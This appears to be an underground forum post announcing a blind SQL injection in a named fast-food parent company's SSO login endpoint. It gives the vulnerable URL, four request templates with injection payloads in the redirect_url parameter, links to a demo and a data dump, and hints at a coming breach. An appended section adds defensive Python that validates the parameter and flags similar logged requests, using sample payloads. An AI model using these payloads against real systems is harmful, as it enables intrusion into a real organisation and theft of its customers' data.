19-12-25, 11:28 AM
Hello darkforums community, today I have found a SQL injection inside a backend login portal for YUM brands. For those who don't know, YUM brands owns 4 massive fast food chains: KFC, Pizza Hut, Taco Bell, and The Habit Burger Grill, and also runs the entire backend management for all four, which is why if you find login admin endpoints for any of these companies it redirects to Yum brands.
The vulnerability is in: https://iam.yum.com/selfservice/ssologin...m.yum.com/
More specifically, it's vulnerable to both a Blind bit and Blind Bin SQLI.
I have tested this around 6-7 times and all times I was able to extract binary bits from the website
Here's an example: files.catbox.moe/n3ehzi.mp4
Raw dump of data I extracted from the website: pastebin.com/raw/qwqVaK8d
### Strategy: Blind bin
Method: GET
Path: /selfservice/ssologin
Query: redirect_url=2000010211'or(<query>)--+-op2a
Header: Content-Type: text/plain
### Strategy: Blind bit
Method: GET
Path: /selfservice/ssologin
Query: redirect_url=2000010211'or(<query>)--+-9UDR
Header: Content-Type: text/plain
### Strategy: Blind bin
Method: GET
Path: /selfservice/ssologin
Query: redirect_url=https://iam.yum.com/or(<query>)--+-lWnU
Header: Content-Type: text/plain
### Strategy: Blind bit
Method: GET
Path: /selfservice/ssologin
Query: redirect_url=https://iam.yum.com/or(<query>)--+-wzBI
Header: Content-Type: text/plain
If someone gained access to this company, they would have massive amounts of data from 5 major companies.
Which may be coming soon within the next month ;)
(BTW, mods if you see this attempted to be uploaded more than once, my bad, the forum went down as I tried to do it the first time, so I'm trying again just to make sure)
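
A defender's view of the request templates in the post above, as an added example that is not part of the original post: strict validation of `redirect_url` plus triage of logged request targets for the same parameter. The allowlisted host, the numeric-id rule and the sample request targets are constructed assumptions, not values from the affected application.

```python
import re
from urllib.parse import urlsplit, parse_qs

ALLOWED_HOSTS = {"sso.example.com"}       # assumption: hosts a redirect may target
NUMERIC_ID = re.compile(r"\d{1,12}")      # assumption: opaque numeric ids are valid
SAFE_PATH = re.compile(r"[A-Za-z0-9/_.~-]*")
# SQL meta-syntax present in the templates: quote, or(...), trailing "-- " comment
SQL_HINT = re.compile(r"'|\bor\s*\(|--\s", re.IGNORECASE)

def redirect_is_valid(value):
    """Accept only a numeric id or an https URL on an allowlisted host."""
    if NUMERIC_ID.fullmatch(value):
        return True
    try:
        parts = urlsplit(value)
    except ValueError:                    # malformed netloc, e.g. stray brackets
        return False
    return (parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS
            and not parts.query and not parts.fragment
            and SAFE_PATH.fullmatch(parts.path) is not None)

def triage(request_target):
    """Return (verdict, reason) for one logged request target."""
    parts = urlsplit(request_target)
    if parts.path != "/selfservice/ssologin":
        return ("ignore", "other path")
    # parse_qs decodes '+' to a space, so "--+-" becomes the SQL comment "-- -"
    values = parse_qs(parts.query, keep_blank_values=True).get("redirect_url", [])
    for value in values:
        if not redirect_is_valid(value):
            reason = "sql-syntax" if SQL_HINT.search(value) else "not-allowlisted"
            return ("alert", reason)
    return ("ok", "")

# Constructed sample request targets (not taken from any real log)
SAMPLES = [
    "/selfservice/ssologin?redirect_url=2000010211",
    "/selfservice/ssologin?redirect_url=https://sso.example.com/home",
    "/selfservice/ssologin?redirect_url=2000010211'or(1=1)--+-abcd",
    "/selfservice/ssologin?redirect_url=https://sso.example.com/or(1=1)--+-abcd",
    "/selfservice/ssologin?redirect_url=https://other.example.net/",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(triage(target), target)
```

Rejecting on the allowlist rather than on the SQL pattern means a payload that avoids the three hinted tokens is still refused; the pattern only labels the alert. The query behind the parameter still needs to be parameterized.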
